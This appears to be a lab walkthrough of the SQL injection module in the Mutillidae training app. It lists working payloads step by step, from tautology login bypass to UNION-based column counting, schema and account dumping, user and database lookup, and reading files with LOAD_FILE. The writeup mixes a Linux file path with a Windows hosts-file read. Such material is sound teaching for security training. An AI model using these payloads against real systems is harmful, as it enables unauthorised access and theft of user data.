Ok Guys we are on our First module its A1 : SQL Injection
If you turn on the hints it will give you the Bubble tip like below and will ask you to insert a single quote to test for any error web application produces.
So if you put a Single quote it will give the following error
Here you can see the important thing is the error line
Findings
/var/www/html/mutillidae/classes/MySQLHandler.php on line 224: Error executing query:
1. “File” – We can see the entire path of the file which is handling this error. From looking at it there is additional information which can be inferred, such as this is more than likely a Linux device on which the server is running.
error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ””’ at line 2
2. From the “Message” we can see that this is a “MySQL or MariaDB” database. Why is this important? The database in the backend will determine the type of interaction we can have with it via the application.
Let’s expand on our “‘ with “‘ or 1=1 — ” (note the space after the 2 hyphens. This is needed for MySQL comments)
Result
So what Happened Here you have dumped the entire Table in the Database, How it’s Possible?
Look at the error below
) Query: SELECT * FROM accounts WHERE username=”’ AND password=’abc’ (0) [Exception]
Now We have inserted ‘ or 1=1 —
This has changed the query to
) Query: SELECT * FROM accounts WHERE username=” or 1=1 —
Remember — indicates the starting of comments so any thing after the comments will be ignored and we are getting all the usernames returned as 1=1 is always true.
More Exploits to try
admin’ — (remember space after the hyphen)
UNION
The UNION operator is used in SQL injections to join a query, purposely forged by the tester, to the original query. The result of the forged query will be joined to the result of the original query, allowing the tester to obtain the values of columns of other tables
Trying to get the database version, let’s try “admin’ UNION SELECT @@version — “
So we got an error above stating “error: The used SELECT statements have a different number of columns”
There is basically 2 ways to find how many columns are selected by the original query. The first one is to inject an ORDER BY clause indicating a column number. Given the column number specified is greater than the number of columns in the SELECT statement, an error will be returned. Otherwise, the results will be sorted by the column mentioned. Let’s see both cases
admin’ order by 2 — (space after hyphens)
So it means table has atleast 2 columns
Now lets try with 3, It gives a error like below.
So we know table has 2 columns only
We know that the select statement has at least 2 columns. To find the exact number of columns, the number is incremented until an error related to the ORDER BY clause is returned.
2nd Way
Let’s try to learn the number of columns in this table. Let’s use “admin’ UNION SELECT NULL — “
When we run the above we got the same error again about the number of columns. So let’s build on this to find out the correct number of “NULL”s we need to use here.
Moreover, we notice that we have adding NULL values. These values are necessary because the two queries must have an equal number of parameters/columns in order to avoid a syntax error.
- Next try …
- “admin’ UNION SELECT NULL — “
- … and then
- “admin’ UNION SELECT NULL,NULL — ”
- … and then
- “admin’ UNION SELECT NULL,NULL,NULL — ”
- … and then
- “admin’ UNION SELECT NULL,NULL,NULL,NULL — “
- … and then
- “admin’ UNION SELECT NULL,NULL,NULL,NULL,NULL — “
- … and then
- “admin’ UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL — ”
- … and then Finally
- “admin’ UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL — “
Because the UNION operator can only be used if both queries have the exact same structure, the attacker must craft a SELECT statement similar to the original query. To do this, a valid table name must be known but it is also necessary to determine the number of columns in the first query and their data type.
Find Table Names in MySQL
In MySQL, the table information_schema.tables contains all the metadata related to table objects. Below is listed the most useful information of this table.
table_name: The name of the table.
table_schema: The schema in which the table was created.
Here is an example showing how to extract this information from a UNION attack.
admin’ AND 1=2 UNION SELECT table_schema, table_name, 1 FROM information_schema.tables –
Let’s look at each columns to determine which ones will accept our strings or at least which ones produces the “username”, “password” and “signature”. To figure this out, let’s put some strings in each null field.
“admin’ UNION SELECT ‘Column-1′,’Column-2′,’Column-3′,’Column-4′,’Column-5′,’Column-6′,’Column-7’ — “
From above we see that Columns 2, 3 and 4 are the ones which we can use with our strings. Let’s revisit that attempt to get the database version. We will also replace the “Column-X” with NULLs
“admin’ UNION SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL — ”
Good progress so far. We have now managed to obtain the database version.
Let’s continue! How about we dump the database schema. so we can see a list of tables with their associated names, etc.
“admin’ UNION SELECT NULL,table_name,column_name,NULL,NULL,NULL,NULL FROM information_schema.columns — ”
Now that we have gotten a dump of the database structure (note image above is a snapshot), we can now look at the other tables, to see where we may be able to extract data of relevance.
Going through the list we see the “accounts” table. This list contains the user information which we were able to obtain at the beginning of the tests. Let’s dump table “accounts” to learn more about it.
“admin’ UNION SELECT NULL,table_name,column_name,data_type,NULL,NULL,NULL FROM information_schema.columns WHERE table_name = ‘accounts’ — ”
We see there are additional fields such as “cid”, “is_admin”, “firstname”, and “lastname”. (note image above is a snapshot)
Let’s see what we can learn about “is_admin”.
“‘ UNION SELECT NULL,cid,username,is_admin,NULL,NULL,NULL FROM accounts — ”
Looks like the value for “is_admin” is either “TRUE” or “FALSE”. From this we have a list of admin users in the database.
Let’s take a look to see which user the application is accessing the database as.
“admin’ UNION SELECT NULL,current_user(),NULL,NULL,NULL,NULL,NULL — “
Very interesting! This application is running as root …
.. and what database are we connected to?
“admin’ UNION SELECT NULL,database(),NULL,NULL,NULL,NULL,NULL — “
Let’s now try to read a file from the server’s filesystem …
”admin’ UNION SELECT NULL,LOAD_FILE(‘..\\..\\..\\..\\WINDOWS\\system32\\drivers\\etc\\hosts’),NULL,NULL,NULL,NULL,NULL -– “
As we can see we managed to load the contents of the “WINDOWS\\system32\\drivers\\etc\\hosts” file.
